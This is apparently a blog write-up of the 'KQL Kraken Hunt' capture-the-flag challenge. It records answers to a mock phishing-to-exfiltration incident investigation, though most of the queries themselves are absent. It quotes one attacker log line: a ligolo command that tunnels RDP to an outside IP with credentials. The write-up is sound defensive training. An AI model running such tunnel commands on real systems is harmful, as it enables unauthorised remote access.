KQL Kraken Hunt

Tools/Skills: KQL, Incident Investigation, Log Analysis, Decoding Base64-Encoded Powershell Commands

SYNOPSIS

An alert is generated that a malicious link was clicked on by an employee.

I found the email with the malicious link & documented the sender and receiver of the email. I then identified the victim's role, hostname and ip address. From there, I was able to find the log showing the victim had clicked on the link, when he clicked on it, and then found a file that was subsequently downloaded on his computer. From there, I found that the attacker had created a remote tunnel, then performed a search on network shares. The attacker later exploited a network share to perform lateral movement within the system. After the lateral movement, the attacker performed 3 base64-encoded powershell commands. I decoded these commands and found that the attacker transferred a file out of the system and then deleted the file from the current system.

While this challenge did not go into escalation of events, at this point, if not before, I would be escalating the alert according to a company's playbook.

SOLUTION & PROCESS

ONBOARDING

  1. How many Craftperson Elf's are working from laptops?

    QUERIES:

    ANSWER:

    25

CASE 1

Track down who sent and who received the malicious link, as well as the subject link of the email with the malicious link: 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'

QUERIES

RESULT

SENT: cwombley@gmail.com

RECEIVED: alabaster_snowball@santaworkshopgeeseislands.org

SUBJECT LINE: “[EXTERNAL] Invoice foir reindeer food past due”

CASE 2

Find the role, hostname and ip address of the victim.

QUERIES:

RESULT:

IP ADDRESS: 10.10.0.4

ROLE: Head Elf

HOSTNAME: Y1US-DESKTOP

CASE 3

What time did the victim click on the link? Were any files downloaded after he clicked on it?

QUERY 1 (time):

RESULT 1 (time):

QUERY 2 (downloaded file):

RESULT 2 (downloaded file):

TIME (OF CLICK): 2023-12-02 10:12:42.0000

DOWNLOADED FILE NAME: giftwrap.exe

CASE 4

Where did the attacker create a remote tunnel to? When did the attacker enumerate network shares? What hostname did the attack perform lateral movement to get to?

Endpoint IP Address from a created Remote Tunnel

QUERY

RESULT:

REMOTE TUNNEL IP ADDRESS: 113.37.9.17

Time & Hostname

QUERY:

RESULT 1 (TIME when attacker enumerated network shares):

RESULT 2 (Hostname of lateral movement)

TIME (OF ENUMERATED NETWORK SHARES): 2023-12-02T16:51:44Z

HOSTNAME (OF LATERAL MOVEMENT): NorthPolefileshare

CASE 5

Find base64 encoded powershell commands and find the name of the file that was transferred and to where.

QUERY

RESULT

FURTHER STEPS

  1. I decoded the four, actually 3, base64 encoded texts in Powershell.

  1. One of the decoded messages was written in reverse, so I wrote it backwards, with some help from AI, discovering the file name.

  2. A 2nd “decoded” message was almost all numbers, which I thought was strange, so I sent it to chatgpt. ChatGPT found how it was encoded and decoded it, showing me the domain the file was sent to.

TIME (OF FIRST ATTACK): 2023-12-24T16:07:47Z

*NOTE:there was an encoded powershell command before this one, but it was a basic update, not indicative of an attack)

FILE TRANSFERRED: NaughtyNiceList.txt

DOMAIN (WHERE FILE WAS SENT): giftbox.com

CASE 6

Determine executable and command flag

QUERY

*I used the previous query.

RESULT

EXECUTABLE: downwithsanta.exe

COMMAND FLAG: --wipeall

ChatGPT Prompts/Answers

Example Prompts:

  • What signs would there be that a reverse tunnel connection with a compromised machine is made? Where would I find the IP the connection forwarded to? (Using KQL)

  • What is the timestamp when the attackers enumerated network shares on the machine?

  • What process names would be indicative of this?

  • Is this a reverse tunnel connection?

    "timestamp": 2023-12-02T11:11:29Z,

    "parent_process_name": cmd.exe,

    "parent_process_hash": 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f,

    "process_commandline": "ligolo" --bind 0.0.0.0:1251 --forward 127.0.0.1:3389 --to 113.37.9.17:22 --username rednose --password falalalala --no-antispoof,

    "process_name": ligolo,

    "process_hash": e9b34c42e29a349620a1490574b87865cc1571f65aa376b928701a034e6b3533,

    "hostname": Y1US-DESKTOP,

    "username": alsnowball

PreviousHoliday Hack Challenge - 2023NextAzure 101

Last updated